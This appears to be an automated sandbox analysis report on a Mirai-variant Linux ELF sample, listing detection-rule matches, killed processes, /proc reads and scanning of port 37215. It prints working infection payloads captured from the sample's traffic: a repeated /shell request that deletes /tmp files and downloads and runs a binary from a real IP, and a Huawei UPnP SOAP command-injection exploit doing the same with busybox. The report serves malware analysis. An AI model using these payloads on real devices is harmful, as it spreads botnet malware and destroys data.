              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
              Source: global trafficDNS traffic detected: DNS query: raw.igxhost.ru
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: z0r0.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: z0r0.spc.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

              System Summary

              barindex
              Source: z0r0.spc.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: z0r0.spc.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3192, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3249, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3250, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3251, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3252, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3253, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3255, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3272, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3274, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5836, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5837, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5838, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5839, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5840, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5841, result: successfulJump to behavior
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3192, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3249, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3250, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3251, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3252, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3253, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3255, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3272, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 3274, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5836, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5837, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5838, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5839, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5840, result: successfulJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)SIGKILL sent: pid: 5841, result: successfulJump to behavior
              Source: z0r0.spc.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: z0r0.spc.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5825.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 5821.1.00007fad3c011000.00007fad3c023000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal100.spre.troj.linELF@0/0@5/0
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5664/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1185/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3241/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3483/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1732/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1730/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1333/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1695/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3235/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3234/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/911/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/515/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/914/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1617/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1615/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/917/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3255/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3253/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1591/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3252/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3251/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3250/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1623/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5828/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1588/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3249/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/764/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3368/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1585/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3246/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3488/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/766/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/800/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/888/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/802/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1509/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/803/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/804/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3800/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3801/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5825/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1867/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3407/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5826/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5840/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1484/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/490/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1514/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5838/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1634/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5839/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1479/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1875/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/654/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3379/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/655/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/656/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/777/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/931/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1595/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/657/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/812/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/779/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/658/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/933/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5831/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5832/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/418/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/419/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3419/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5836/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5837/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3310/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3275/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3274/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3273/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3394/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3272/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/782/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3303/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1762/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3027/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1486/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/789/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/5841/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1806/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3943/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1660/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3044/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3440/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/793/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/794/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3316/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/674/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/796/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/675/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/676/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1498/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1497/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/1496/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3157/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3278/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3399/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3798/cmdlineJump to behavior
              Source: /tmp/z0r0.spc.elf (PID: 5833)File opened: /proc/3799/cmdlineJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 56422 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53094 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47592 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33992 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 48016 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 54460 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37500 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44564 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 34294 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 57500 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42116 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35832 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38138 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36264 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52870 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 51726 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38764 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 42968 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35030 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47320 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38780 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33700 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38760 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 35530 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 44860 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37782 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38036 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56370 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 52170 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 50816 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58172 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 33738 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 43732 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53468 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 58936 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 39476 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 56738 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 40888 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38700 -> 37215
